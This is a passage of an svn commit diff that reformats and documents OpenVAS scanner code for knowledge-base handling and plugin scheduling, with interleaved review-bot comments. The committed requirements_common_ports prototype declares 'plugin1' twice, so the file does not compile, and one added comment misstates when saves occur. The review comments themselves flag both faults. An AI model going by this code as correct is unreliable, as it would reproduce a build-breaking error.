INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_SENDING_INT); - } - else - internal_send(soc, NULL, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_ERROR); - return; - } - - if ( buf[0] == '\0' ) + if (msg & INTERNAL_COMM_KB_GET) + { + struct kb_item * kitem = kb_item_get_single (kb, buf, 0); + + if (kitem == NULL) + { + internal_send (soc, NULL, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_ERROR); + return; + } + + if (kitem->type == KB_TYPE_STR) + { + internal_send (soc, kitem->v.v_str, 
INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_SENDING_STR); + return; + } + else if (kitem->type == KB_TYPE_INT) + { + char buf[64]; + snprintf (buf, sizeof (buf), "%d", kitem->v.v_int); + internal_send (soc, buf, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_SENDING_INT); + } + else + internal_send (soc, NULL, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_ERROR); + + return; + } + + if (buf[0] == '\0') return; - - buf_len = strlen(buf); - - if(buf[buf_len - 1]=='\n') - buf[ buf_len - 1 ]='\0'; - - c = strrchr(buf, ';'); - if(c != NULL ) + + buf_len = strlen (buf); + + if (buf[buf_len - 1] == '\n') + buf[buf_len - 1] = '\0'; + + c = strrchr (buf, ';'); + if (c != NULL) c[0] = '\0'; - - t = strchr(buf, ' '); - if( t == NULL ) + + t = strchr(buf, ' '); + if (t == NULL) return; - - t[0] = '\0'; - type = atoi(buf); - t[0] = ' '; + t[0] = '\0'; + type = atoi (buf); + t[0] = ' '; - value = strchr(buf, '='); - - if( value == NULL ) - return; - + value = strchr (buf, '='); + + if (value == NULL) + return; + value[0]='\0'; value++; - + name = t+1; - - if ( type == ARG_INT ) - { - int v = atoi(value); - if ( msg & INTERNAL_COMM_KB_REPLACE ) - kb_item_set_int(kb, name,v); - else - { - kb_item_add_int(kb, name,v); - if(save_kb(globals))save_kb_write_int(globals, arg_get_value(globals, "CURRENTLY_TESTED_HOST"), name,v); - } - } + + if (type == ARG_INT) + { + int v = atoi (value); + if (msg & INTERNAL_COMM_KB_REPLACE) + kb_item_set_int(kb, name,v); + else + { + kb_item_add_int(kb, name,v); + if (save_kb(globals)) + save_kb_write_int (globals, arg_get_value (globals, "CURRENTLY_TESTED_HOST"), name,v); + } + } else - { - copy = rmslashes(value); - if ( msg & INTERNAL_COMM_KB_REPLACE ) - kb_item_set_str(kb, name, copy); - else - { - kb_item_add_str(kb, name, copy); - if(save_kb(globals))save_kb_write_str(globals, arg_get_value(globals, "CURRENTLY_TESTED_HOST"), name, copy); - } - efree(©); - } + { + copy = rmslashes (value); + if (msg & INTERNAL_COMM_KB_REPLACE) + kb_item_set_str (kb, name, 
copy); + else + { + kb_item_add_str (kb, name, copy); + if (save_kb (globals)) + save_kb_write_str (globals, arg_get_value (globals, "CURRENTLY_TESTED_HOST"), name, copy); + } + efree (©); + } } - - Modified: trunk/openvas-scanner/openvassd/pluginscheduler.c =================================================================== --- trunk/openvas-scanner/openvassd/pluginscheduler.c 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/openvassd/pluginscheduler.c 2009-10-05 09:09:07 UTC (rev 5363) @@ -104,10 +104,10 @@ int i; if(h == NULL) return; - + if(h->next != NULL) hash_link_destroy(h->next); - + if( h->dependencies != NULL ) { for(i=0;h->dependencies[i] != NULL;i++) @@ -119,7 +119,7 @@ efree(&h->dependencies_ptr); efree(&h->plugin); - + if( h->ports != NULL ) { for(i=0;h->ports[i] != NULL;i++) @@ -128,14 +128,15 @@ } efree(&h->ports); } - + efree(&h); } -static void hash_destroy(struct hash * h) +static void +hash_destroy (struct hash * h) { int i; - + for(i=0;iarglist->value); struct arglist * ports = plug_get_required_ports(plugin->arglist->value); int num_deps = 0; - + l->plugin = plugin; l->plugin->parent_hash = l; l->name = name; l->next = h[idx].next; h[idx].next = l; l->dependencies_ptr = NULL; - + if( deps == NULL ) l->dependencies = NULL; else @@ -166,7 +168,7 @@ struct arglist * al = deps; int i = 0; while (al->next) - { + { num_deps ++; al = al->next; } @@ -179,7 +181,7 @@ al = al->next; } } - + if( ports == NULL ) l->ports = NULL; else @@ -192,7 +194,7 @@ num_ports ++; al = al->next; } - + l->ports = emalloc((num_ports + 1) * sizeof(char*)); al = ports; while (al->next != NULL ) @@ -207,7 +209,8 @@ -static struct hash * _hash_get(struct hash * h, char * name) +static struct hash * +_hash_get (struct hash * h, char * name) { unsigned int idx = mkhash(name); struct hash * l = h[idx].next; 
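Review bot: in openvassd/piic.c the new comment on kb_parse says the entry on the file system is modified too when the knowledge base is saved to disc, but save_kb_write_int and save_kb_write_str are only called in the branch taken without INTERNAL_COMM_KB_REPLACE; a replace changes the in-memory item alone. Either limit that sentence to added items or add a @todo for the replace path. The block also documents only `soc` and `msg`: `globals`, `kb` and `buf` need @param lines, including that `buf` is modified in place (the trailing newline, the last ';' and the '=' are overwritten with '\0'). The local `char buf[64]` in the KB_TYPE_INT branch shadows the parameter of the same name and is worth renaming while the function is being reindented.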
@@ -222,20 +225,22 @@ } -static struct hash ** hash_get_deps_ptr(struct hash * h, char * name) +static struct hash ** +hash_get_deps_ptr (struct hash * h, char * name) { struct hash * l = _hash_get(h, name); - + if( l == NULL ) return NULL; - + if( l->dependencies_ptr == NULL ) return NULL; - + return l->dependencies_ptr; } -static void hash_fill_deps(struct hash * h, struct hash * l ) +static void +hash_fill_deps (struct hash * h, struct hash * l ) { int i, j = 0; if ( l->num_deps != 0 ) @@ -320,7 +325,7 @@ pl->prev = NULL; sched->plist = pl; } - } + } } void scheduler_rm_running_ports(plugins_scheduler_t sched, struct scheduler_plugin * plugin) @@ -328,18 +333,15 @@ char ** ports; int i; - ports = plugin->parent_hash->ports; - if( ports == NULL ) return; - + for (i = 0 ; ports[i] != NULL ; i ++ ) { struct plist * pl = pl_get(sched->plist, ports[i]); - - + if( pl != NULL ) { pl->occurences --; @@ -347,7 +349,7 @@ { if( pl->next != NULL ) pl->next->prev = pl->prev; - + if( pl->prev != NULL ) pl->prev->next = pl->next; else @@ -373,20 +375,19 @@ char ** ports = hash_get_ports(sched->hash, plugin->arglist->name); int i; int score = 0; - + if( ports == NULL ) return 0; - for (i = 0; ports[i] != NULL; i ++) { struct plist * pl = pl_get(sched->plist, ports[i]); if(pl != NULL) - { + { if(pl->occurences > score) score = pl->occurences; } - } + } return score; } @@ -408,7 +409,10 @@ -struct scheduler_plugin * plugin_next_unrun_dependencie(plugins_scheduler_t sched, struct hash ** dependencies_ptr, int already_in_dependencie) +struct scheduler_plugin * +plugin_next_unrun_dependencie (plugins_scheduler_t sched, + struct hash ** dependencies_ptr, + int already_in_dependencie) { int flag = 0; int counter = 0; @@ -416,7 +420,7 @@ if(dependencies_ptr == NULL) return NULL; - + for(i=0;dependencies_ptr[i] != NULL;i++) { struct scheduler_plugin * plugin = dependencies_ptr[i]->plugin; 
@@ -437,7 +441,7 @@ ret = plugin_next_unrun_dependencie(sched, deps_ptr, 1); if(ret == NULL) return plugin; - else + else if( ret == PLUG_RUNNING ) flag ++; else @@ -456,7 +460,7 @@ } } } - + if(flag == 0) return NULL; else @@ -468,7 +472,10 @@ /* * Enables a plugin and its dependencies */ -static void enable_plugin_and_dependencies(plugins_scheduler_t shed, struct arglist * plugin, char * name, int silent) +static void +enable_plugin_and_dependencies (plugins_scheduler_t shed, + struct arglist * plugin, + char * name, int silent) { struct hash ** deps_ptr; int i; @@ -486,7 +493,7 @@ else plug_set_launch(plugin, LAUNCH_SILENT); } - + if(deps_ptr != NULL) { for(i=0;deps_ptr[i] != NULL;i++) @@ -506,17 +513,13 @@ struct arglist * arg; int i; struct hash * l; - - - - + + if(plugins == NULL) return NULL; - - - /* - * Fill our lists - */ + + + /* Fill our lists */ ret->hash = hash_init(); arg = plugins; while(arg->next != NULL) @@ -524,7 +527,7 @@ struct scheduler_plugin * scheduler_plugin; struct list * dup; int category = plug_get_category(arg->value); - + scheduler_plugin = emalloc ( sizeof(struct scheduler_plugin) ) ; scheduler_plugin->arglist = arg; scheduler_plugin->running_state = PLUGIN_STATUS_UNRUN; @@ -551,8 +554,8 @@ hash_add(ret->hash, arg->name, scheduler_plugin); arg = arg->next; } - - + + for ( i = 0 ; i < HASH_MAX ; i ++ ) { l = &ret->hash[i]; @@ -572,8 +575,8 @@ arg = arg->next; } } - - + + /* Now, remove the plugins that won't be launched */ for(i= ACT_FIRST ; i <= ACT_LAST ; i++) { 
@@ -602,31 +605,30 @@ l = l->next; } } - + return ret; } -struct scheduler_plugin * plugins_scheduler_next(plugins_scheduler_t h) +struct scheduler_plugin * +plugins_scheduler_next (plugins_scheduler_t h) { - struct list * l; int category; int running_category = ACT_LAST; int flag = 0; - + if(h == NULL) return NULL; - + for(category = ACT_FIRST;category<=ACT_LAST;category++) { l = h->list[category]; - + /* * Scanners (and DoS) must not be run in parallel */ - if((category == ACT_SCANNER) || (category == ACT_KILL_HOST) || (category == ACT_FLOOD) || @@ -634,25 +636,23 @@ pluginlaunch_disable_parrallel_checks(); else pluginlaunch_enable_parrallel_checks(); - - + while(l != NULL) { int state; - + state = plugin_get_running_state(l->plugin); - - + switch(state) { case PLUGIN_STATUS_UNRUN: { struct hash ** deps_ptr = l->plugin->parent_hash->dependencies_ptr; - + if(deps_ptr != NULL) { struct scheduler_plugin * p = plugin_next_unrun_dependencie(h, deps_ptr, 0); - + switch(GPOINTER_TO_SIZE(p)) { case GPOINTER_TO_SIZE(NULL) : @@ -706,8 +706,7 @@ l->prev->next = l->next; else h->list[category] = l->next; - - + if(l->next != NULL) l->next->prev = l->prev; @@ -718,10 +717,10 @@ } break; } - l = l->next; + l = l->next; } - + /* Could not find anything */ if((category == ACT_SCANNER || category == ACT_INIT || @@ -731,19 +730,20 @@ flag = 0; category --; } - + if(category + 1 >= ACT_DENIAL && flag && running_category < ACT_DENIAL) - { - return PLUG_RUNNING; + { + return PLUG_RUNNING; } } - + return flag != 0 ? PLUG_RUNNING : NULL; } -void list_destroy(struct list * list) +void +list_destroy (struct list * list) { while(list != NULL) { @@ -754,7 +754,8 @@ } -void plugins_scheduler_free(plugins_scheduler_t sched) +void +plugins_scheduler_free (plugins_scheduler_t sched) { int i; hash_destroy(sched->hash); 
@@ -762,6 +763,3 @@ list_destroy(sched->list[i]); efree(&sched); } - - - Modified: trunk/openvas-scanner/openvassd/plugs_req.c =================================================================== --- trunk/openvas-scanner/openvassd/plugs_req.c 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/openvassd/plugs_req.c 2009-10-05 09:09:07 UTC (rev 5363) @@ -27,8 +27,9 @@ * */ - + #include + #include "pluginscheduler.h" #include "plugs_req.h" 
@@ -37,55 +38,48 @@ Private Functions ***********************************************************/ - + extern int kb_get_port_state_proto(struct kb_item **, struct arglist*, int, char*); - + /*--------------------------------------------------------- Returns whether a port in a port list is closed or not ----------------------------------------------------------*/ static int -get_closed_ports(kb, ports, preferences) - struct kb_item ** kb; - struct arglist * ports; - struct arglist * preferences; +get_closed_ports (struct kb_item ** kb, struct arglist * ports, + struct arglist * preferences) { if(ports == NULL) return -1; - + while(ports->next != NULL) { - int iport = atoi(ports->name); + int iport = atoi(ports->name); if(iport != 0) { if( kb_get_port_state_proto(kb, preferences, iport, "tcp") != 0 ) return iport; } - else + else { - if( kb_item_get_int(kb, ports->name) > 0 ) return 1; /* should be the actual value indeed ! */ - } + } ports = ports->next; } return 0; /* found nothing */ } -/*----------------------------------------------------------- - - Returns whether a port in a port list is closed or not - - ------------------------------------------------------------*/ +/** + * @brief Returns whether a port in a port list is closed or not. + */ static int -get_closed_udp_ports(kb, ports, preferences) - struct kb_item ** kb; - struct arglist * ports; - struct arglist * preferences; -{ +get_closed_udp_ports (struct kb_item ** kb, struct arglist * ports, + struct arglist * preferences) +{ if( ports == NULL ) return -1; else while( ports->next != NULL) 
@@ -98,16 +92,11 @@ } -/*----------------------------------------------------------- - - Returns the name of the first key - which is not in - - -----------------------------------------------------------*/ -static char * -key_missing(kb, keys) - struct kb_item ** kb; - struct arglist * keys; +/** + * @brief Returns the name of the first key which is not \ref kb. + */ +static char * +key_missing (struct kb_item ** kb, struct arglist * keys) { if(kb == NULL || keys == NULL ) return NULL; @@ -123,14 +112,11 @@ return NULL; } -/*----------------------------------------------------------- - - The opposite of the previous function - - -----------------------------------------------------------*/ -static char * key_present(kb, keys) - struct kb_item ** kb; - struct arglist * keys; +/** + * @brief The opposite of the previous function (\ref key_missing). + */ +static char * +key_present (struct kb_item ** kb, struct arglist * keys) { if( kb == NULL || keys == NULL ) return NULL; @@ -144,7 +130,7 @@ } } return NULL; -} +} /********************************************************** @@ -155,24 +141,21 @@ -/*------------------------------------------------------ - - Returns if the lists of the required ports between - plugin 1 and plugin 2 have at least one port in common - - - ------------------------------------------------------*/ -struct arglist * -requirements_common_ports(plugin1, plugin2) - struct scheduler_plugin * plugin1, *plugin2; +/** + * @brief Returns \ if the lists of the required ports between + * @brief plugin 1 and plugin 2 have at least one port in common. + */ +struct arglist * +requirements_common_ports (struct scheduler_plugin * plugin1, + struct scheduler_plugin * plugin1) { struct arglist * ret = NULL; struct arglist * req1; struct arglist * req2; - - + + if(!plugin1 || !plugin2) return 0; - + req1 = plugin1->required_ports; if ( req1 == NULL ) return 0; 
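Review bot: the new ANSI prototype of requirements_common_ports names both parameters `plugin1` (`struct scheduler_plugin * plugin1, struct scheduler_plugin * plugin1`), while the body still tests `!plugin2` and reads `plugin2->required_ports`, so plugs_req.c does not compile as committed. Rename the second parameter to `plugin2`, matching the K&R declaration `struct scheduler_plugin * plugin1, *plugin2;` that this hunk removes. A conversion like this is worth a build before committing, even when the log says "Cosmetics".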
@@ -180,7 +163,7 @@ req2 = plugin2->required_ports; if ( req2 == NULL ) return 0; - + while(req1->next != NULL) { struct arglist * r = req2; @@ -193,7 +176,7 @@ if(!ret)ret = emalloc(sizeof(struct arglist)); arg_add_value(ret, r->name, ARG_INT, 0,(void*)1); } - } + } r = r->next; } req1 = req1->next; @@ -215,25 +198,18 @@ struct scheduler_plugin * plugin) { if(key_missing(kb, plugin->mandatory_keys)) return 0; - + return 1; } -/*------------------------------------------------------- - - Determine if the plugin requirements are - met. - - Returns NULL is everything is ok, or else - returns an error message - ----------------------------------------------------------*/ - +/** + * @brief Determine if the plugin requirements are met. + * + * @return Returns NULL is everything is ok, else an error message. + */ char * -requirements_plugin(kb, plugin, preferences) - struct kb_item ** kb; - struct scheduler_plugin * plugin; - struct arglist * preferences; +requirements_plugin (struct kb_item ** kb, struct scheduler_plugin * plugin, + struct arglist * preferences) { static char error[64]; char * missing; @@ -244,14 +220,14 @@ /* * Check wether the good ports are open */ - error[sizeof(error) - 1] = '\0'; + error[sizeof(error) - 1] = '\0'; tcp = plugin->required_ports; if(tcp != NULL && (get_closed_ports(kb, tcp , preferences)) == 0) { strncpy(error, "none of the required tcp ports are open", sizeof(error) - 1); return error; } - + udp = plugin->required_udp_ports; if(udp != NULL && (get_closed_udp_ports(kb, udp , preferences)) == 0) { 
@@ -271,7 +247,7 @@ snprintf(error,sizeof(error), "because the key %s is missing", missing); return error; } - + if (opti != NULL && (strcmp(opti, "required_keys") == 0 || atoi(opti) == 2)) return NULL; Modified: trunk/openvas-scanner/openvassd/save_kb.c =================================================================== --- trunk/openvas-scanner/openvassd/save_kb.c 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/openvassd/save_kb.c 2009-10-05 09:09:07 UTC (rev 5363) @@ -33,7 +33,7 @@ * This has not only importance for debugging, but could also allow differential * scans and information gain other than vulnerabilities of targets. * @see diff_scan - * + * * Knowledge base backups are (if the appropriate preferences are set) saved * under (PREFIX)var/lib/openvas/users/(USERNAME)/kbs/(HOSTNAME) , * where strings in brackets have to be replaced by the respective value. @@ -63,10 +63,10 @@ ===========================================================================*/ /** - * @brief Replaces slashes in name by underscores. - * + * @brief Replaces slashes in name by underscores (in-place). + * * @param name String in which slashes will be replaced by underscores. - * + * * @return Pointer to the parameter name string. */ static char * @@ -106,7 +106,7 @@ { char *t; int ret = 0; - + dir = estrdup(dir); t = strchr(dir+1, '/'); while(t) @@ -116,8 +116,7 @@ t[0] = '/'; t = strchr(t+1, '/'); } - - + if ((ret = mkdir(dir, 0700)) < 0) { if(errno != EEXIST) log_write("mkdir(%s) failed : %s\n", dir, strerror(errno)); @@ -130,7 +129,10 @@ /** - * From , return /path/to/var/lib/openvas//kbs/ . + * @brief Returns file name where the kb for scan of a host can be saved/read + * @brief from. + * + * From \, return /path/to/var/lib/openvas/\/kbs/\ . */ static char* kb_fname (struct arglist* globals, char* hostname) 
@@ -138,9 +140,10 @@ gchar * dir = kb_dirname(globals); char * ret; char * hn = strdup(hostname); - - hn = filter_odd_name(hn); - + + hn = filter_odd_name (hn); + + /** @todo use glibs *build_path functions */ ret = emalloc(strlen(dir) + strlen(hn) + 2); sprintf(ret, "%s/%s", dir, hn); g_free (dir); @@ -159,13 +162,13 @@ char *ret; int i = 0; int len; - + bzero(&st, sizeof(st)); fstat(file, &st); len = (int)st.st_size; if ( len == 0 ) return NULL; - + lseek(file, 0, SEEK_SET); ret = emalloc(len + 1); while(i < len ) @@ -181,11 +184,11 @@ return NULL; } } - + lseek(file, len, SEEK_SET); return ret; } - + static int save_kb_entry_present_already (struct arglist * globals, char * hostname, char* name, char* value) @@ -194,11 +197,11 @@ int fd; char* req; int ret; - + fd = GPOINTER_TO_SIZE(arg_get_value(globals, "save_kb")); if(fd <= 0) return -1; - + buf = map_file(fd); if(buf) { @@ -213,8 +216,8 @@ return ret; } return -1; -} - +} + static int save_kb_rm_entry_value (struct arglist* globals, char* hostname, char* name, char* value) @@ -223,34 +226,34 @@ char * t; int fd; char * req; - - + + fd = GPOINTER_TO_SIZE(arg_get_value(globals, "save_kb")); if(fd <= 0) return -1; - + buf = map_file(fd); if(buf) { if(value) - { + { req = emalloc(strlen(name) + strlen(value) + 2); sprintf(req, "%s=%s", name, value); } - else + else req = estrdup(name); - + t = strstr(buf, req); if(t) { char * end; - + while(t[0] != '\n') { if(t == buf)break; else t--; } - + if(t[0] == '\n')t++; end = strchr(t, '\n'); t[0] = '\0'; @@ -263,18 +266,18 @@ { log_write("lseek() failed - %s\n", strerror(errno)); } - + if((ftruncate(fd, 0))<0) { log_write("ftruncate() failed - %s\n", strerror(errno)); } - - + + if(write(fd, buf, strlen(buf)) < 0) { log_write("write() failed - %s\n", strerror(errno)); } - + if(end){ if((write(fd, end, strlen(end)))<0) log_write("write() failed - %s\n", strerror(errno)); 
@@ -288,85 +291,90 @@ } static int -save_kb_rm_entry(globals, hostname, name) - struct arglist * globals; - char * hostname; - char * name; +save_kb_rm_entry (struct arglist * globals, char * hostname, char * name) { return save_kb_rm_entry_value(globals, hostname, name, NULL); } - + /** - * Write data + * @brief Writes an entry to a knowledge base file. * - * We want to avoid duplicates for : + * The entry will look like: + * 1254307384 1 Banner/22=SSH-2.0-OpenSSH_5.1p1 Debian-5\r\n + * where the first value is a timestamp, the second item is the \ref type, + * and the string before the equalsign in the third item is the key for the + * knowledge base and the rest the value for that key. * - * Successful/... - * SentData/... - * Launched/... + * Duplicates for keys starting with: + * Successful/... + * SentData/... + * Launched/... + * are not created (existing values are removed first). + * Any items starting with /tmp/, NIDS/ or Settings/ are not written to the file + * but rather ignored. * - * Ignores any items starting with /tmp/, NIDS/ or Settings/ + * @param name Key of the kb-item. + * @return -1 if invalid file handle to write to or any parameter is NULL, 0 + * otherwise. 
*/ static int save_kb_write (struct arglist * globals, char* hostname, char* name, char* value, int type) { - int fd; - char * str; - int e; - struct timeval now; + int fd; + char * str; + int e; + struct timeval now; - if(!globals || - !hostname || - !name || - !value) - return -1; - - fd = GPOINTER_TO_SIZE(arg_get_value(globals, "save_kb")); - if(fd <= 0) - { - log_write("user %s : Can not find KB fd for %s\n", (char*)arg_get_value(globals, "user"), hostname); - return -1; - } - + if (!globals || !hostname || !name || !value) + return -1; - /* - * Don't save temporary KB entries - */ - if(!strncmp(name, "/tmp/", 4) || - !strncmp(name, "NIDS/", 5) || - !strncmp(name, "Settings/", 9)) - return 0; + fd = GPOINTER_TO_SIZE (arg_get_value(globals, "save_kb")); + if (fd <= 0) + { + log_write ("user %s : Can not find KB fd for %s\n", + (char*) arg_get_value (globals, "user"), hostname); + return -1; + } - /* Don't save sensitive information */ - if (strncmp(name, "Secret/", 7) == 0) - return 0; + /* Skip temporary KB entries */ + if (!strncmp (name, "/tmp/", 4) || + !strncmp (name, "NIDS/", 5) || + !strncmp (name, "Settings/", 9)) + return 0; - /* - * Avoid duplicates for these families - */ - if(!strncmp(name, "Success/", strlen("Success/")) || - !strncmp(name, "Launched/", strlen("Launched/")) || - !strncmp(name, "SentData/", strlen("SentData/"))) + /* Don't save sensitive information */ + if (strncmp (name, "Secret/", 7) == 0) + return 0; + + /* Avoid duplicates for these families */ + if (!strncmp (name, "Success/", strlen ("Success/")) || + !strncmp (name, "Launched/", strlen ("Launched/")) || + !strncmp (name, "SentData/", strlen ("SentData/"))) { - save_kb_rm_entry(globals, hostname, name); + save_kb_rm_entry (globals, hostname, name); } - - if(save_kb_entry_present_already(globals, hostname, name, value)) - { - save_kb_rm_entry_value(globals, hostname, name, value); - } - - str = emalloc(strlen(name) + strlen(value) + 25); - gettimeofday(&now, NULL); - 
sprintf(str, "%ld %d %s=%s\n", (long)now.tv_sec, type, name, value); - e = write(fd, str, strlen(str)); - if(e < 0) - { - log_write("user %s : write kb error - %s\n", (char*)arg_get_value(globals, "user"), strerror(errno)); - } - efree(&str); - return 0; + + if (save_kb_entry_present_already (globals, hostname, name, value)) + { + save_kb_rm_entry_value (globals, hostname, name, value); + } + + str = emalloc (strlen (name) + strlen (value) + 25); + gettimeofday (&now, NULL); + sprintf (str, "%ld %d %s=%s\n", (long) now.tv_sec, type, name, value); + + /** @todo Fix a bug (most probably race condition). Although following write + * call does return > 0, sometimes the content never reaches the file, + * especially for big amount of data in value (e.g. big file contents) */ + e = write (fd, str, strlen (str)); + if (e < 0) + { + log_write ("user %s : write kb error - %s\n", + (char*) arg_get_value (globals, "user"), strerror (errno)); + } + efree (&str); + return 0; } @@ -378,8 +386,8 @@ /** * @brief Initialize a new KB that will be saved. - * - * The indexes of all the opened KB are in a hashlist in + * + * The indices of all the opened KB are in a hashlist in * globals, saved under the name "save_kb". This makes no sense * at this time, as the test of each host is done in a separate * process, but this allows us to regroup easily these in @@ -399,9 +407,9 @@ dir = kb_dirname(globals); kb_mkdir(dir); efree(&dir); - + fname = kb_fname(globals, hostname); - + if(file_locked(fname)) { efree(&fname); 
@@ -440,17 +448,16 @@ } /** - * Returns <1> if we already saved a KB for this host, - * less than seconds ago. If is - * equal to zero, then the age is not taken in account - * (returns true if a knowledge base exists) + * @return 1 if we already saved a KB for this host, less than \ + * seconds ago. If \ equals zero, then the age is not taken in + * account (returns true if a knowledge base exists). */ int save_kb_exists (struct arglist * globals, char * hostname) { char * fname = kb_fname(globals, hostname); FILE *f; - + if(file_locked(fname)) { efree(&fname); @@ -467,12 +474,12 @@ int -save_kb_write_str (struct arglist * globals, char * hostname, char* name, +save_kb_write_str (struct arglist * globals, char * hostname, char* name, char* value) { char * newvalue = addslashes(value); int e; - + e = save_kb_write(globals, hostname, name, newvalue, ARG_STRING); efree(&newvalue); return e; @@ -502,11 +509,11 @@ char * fname = kb_fname(globals, hostname); char * bakname; int fd; - + bakname = emalloc(strlen(fname) + 5); strcat(bakname, fname); strcat(bakname, ".bak"); - + unlink(fname); if((fd = open(bakname, O_RDONLY)) >= 0) { @@ -525,27 +532,26 @@ char * fname = kb_fname(globals, hostname); char * newname = NULL; int fd_src = -1, fd_dst = -1; - - + if(file_locked(fname)) { log_write("%s is locked\n", fname); goto failed1; } - + file_lock(fname); - + newname = emalloc(strlen(fname) + 5); strcat(newname, fname); strcat(newname, ".bak"); - + if((fd_src = open(fname, O_RDONLY)) >= 0) { char buf[4096]; int n; fd_dst = open(newname, O_WRONLY|O_CREAT|O_TRUNC, 0640); if(fd_dst < 0) - { + { log_write("save_kb_backup failed : %s", strerror(errno)); close(fd_src); goto failed; @@ -565,13 +571,13 @@ goto failed; } m+=e; - } + } bzero(buf, sizeof(buf)); } } - else + else log_write("save_kb_backup failed : %s\n", strerror(errno)); - + close(fd_src); close(fd_dst); efree(&newname); 
@@ -580,7 +586,7 @@ return 0; failed: file_unlock(fname); -failed1: +failed1: efree(&fname); efree(&newname); return -1; @@ -602,7 +608,7 @@ struct kb_item ** kb; char buf[4096]; long max_age = save_kb_max_age(globals); - + if(file_locked(fname)) { efree(&fname); @@ -617,52 +623,55 @@ } bzero(buf, sizeof(buf)); fgets(buf, sizeof(buf) - 1, f); - + kb = kb_new(); - /* - * Ignore the date - */ - bzero(buf, sizeof(buf)); - + + /* Ignore the date */ + bzero(buf, sizeof(buf)); + while(fgets(buf, sizeof(buf) - 1, f)) { int type; char * name, * value, *t; struct timeval then, now; - + buf[strlen(buf)-1]='\0'; /* chomp(buf) */ t = strchr(buf, ' '); - if(!t)continue; - + if (!t) + continue; + t[0] = '\0'; - + then.tv_sec = atol(buf); t[0] = ' ';t++; type = atoi(t); t = strchr(t, ' '); - if(!t) - continue; + if (!t) + continue; + t[0] = ' ';t++; name = t; t = strchr(name, '='); - if(!t)continue; + if (!t) + continue; + t[0] = '\0'; name = strdup(name); t[0] = ' '; t++; value = strdup(t); - + if(strcmp(name, "Host/dead") && strncmp(name, "/tmp/", 4) && strcmp(name, "Host/ping_failed")) { gettimeofday(&now, NULL); if(now.tv_sec - then.tv_sec > max_age) { - /* + /* log_write("discarding %s because it's too old\n", name, (now.tv_sec - then.tv_sec)); - */ + */ } else { @@ -681,7 +690,7 @@ bzero(buf, sizeof(buf)); } fclose(f); - + /* * Re-open the file */ 
@@ -707,26 +716,29 @@ /** * @return 1 if the user wants us the save the knowledge base. + * @todo This operation is possibly executed often (with every kb modification). + * Evaluate wether the preference can change during a scan, consider the + * use of a static variable. */ int save_kb (struct arglist * globals) { - struct arglist * preferences; - char * value; - - if(!globals) + struct arglist * preferences; + char * value; + + if (!globals) + return 0; + + preferences = arg_get_value (globals, "preferences"); + if (!preferences) + return 0; + + value = arg_get_value (preferences, "save_knowledge_base"); + + if (value && !strcmp (value, "yes")) + return 1; + return 0; - - preferences = arg_get_value(globals, "preferences"); - if(!preferences) - return 0; - - value = arg_get_value(preferences, "save_knowledge_base"); - - if(value && !strcmp(value, "yes")) - return 1; - - return 0; } /** @@ -737,11 +749,11 @@ { struct arglist * preferences = arg_get_value(globals, "preferences"); char * value; - + value = arg_get_value(preferences, "only_test_hosts_whose_kb_we_have"); if(value && !strcmp(value, "yes")) return 1; - + return 0; } @@ -753,11 +765,11 @@ { struct arglist * preferences = arg_get_value(globals, "preferences"); char * value; - + value = arg_get_value(preferences, "only_test_hosts_whose_kb_we_dont_have"); if(value && !strcmp(value, "yes")) return 1; - + return 0; } @@ -769,11 +781,11 @@ { struct arglist * preferences = arg_get_value(globals, "preferences"); char * value; - + value = arg_get_value(preferences, "kb_restore"); if(value && !strcmp(value, "yes")) return 1; - + return 0; } 
@@ -806,7 +818,7 @@ break; /* ACT_SETTINGS and ACT_INIT should always be executed */ } - + if(name) { value = arg_get_value(preferences, name); Modified: trunk/openvas-scanner/openvassd/save_tests.c =================================================================== --- trunk/openvas-scanner/openvassd/save_tests.c 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/openvassd/save_tests.c 2009-10-05 09:09:07 UTC (rev 5363) @@ -173,7 +173,7 @@ asctime = emalloc(2048); t = time(NULL); lt = localtime(&t); - + /* * Session id : - */ @@ -182,10 +182,10 @@ dir = session_dirname(globals); session_mkdir(dir); efree(&dir); - + index_fname = session_fname(globals, asctime, "index"); data_fname = session_fname(globals, asctime, "data"); - + index = open(index_fname, O_CREAT|O_WRONLY|O_EXCL, 0600); file_lock(index_fname); if(index < 0) @@ -198,7 +198,7 @@ { struct arglist * prefs = arg_get_value(globals, "preferences"); char * target = arg_get_value(prefs, "TARGET"); - + log_write("user %s : session will be saved as %s", user, index_fname); if(arg_get_value(globals, "save_tests_index")) { @@ -206,7 +206,7 @@ } else arg_add_value(globals, "save_tests_index", ARG_INT, sizeof(gpointer), GSIZE_TO_POINTER(index)); - + if(arg_get_value(globals, "save_tests_index_fname")) { char * s = arg_get_value(globals, "save_tests_index_fname"); @@ -223,7 +223,7 @@ write(index, target, strlen(target)); write(index, "\n", 1); } - + data = open(data_fname, O_CREAT|O_WRONLY|O_EXCL, 0600); file_lock(data_fname); if(data < 0) 
@@ -454,20 +454,17 @@ session); return -1; } - + stat(index, &st); len = (int)st.st_size; - - /* - * Get the first line of our file, which contains the - * list of hosts to test - */ + + /* Get the first line of our file, which contains the list of hosts to test */ buf = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0); t = buf; while(t[length] && t[length]!='\n')length++; munmap(buf, len); close(fd); - + target = emalloc(length+3); f = fopen(index, "r"); fgets(target, length+2, f); @@ -476,10 +473,8 @@ buf = emalloc(4096); tested = g_hash_table_new_full (g_str_hash, g_str_equal, g_free, NULL); - /* - * Populate our harglst with the names of the - * hosts that have been completely tested - */ + /* Populate our hashtable with the names of the hosts that have been completely + * tested */ while(fgets(buf, 4095, f)) { if (buf[strlen(buf)-1] == '\n') @@ -491,9 +486,7 @@ efree(&buf); fclose(f); - /* - * Set the global variables accordingly - */ + /* Set the global variables accordingly */ if(arg_get_value(globals, "TESTED_HOSTS")) arg_set_value(globals, "TESTED_HOSTS", -1, tested); else Modified: trunk/openvas-scanner/openvassd/utils.c =================================================================== --- 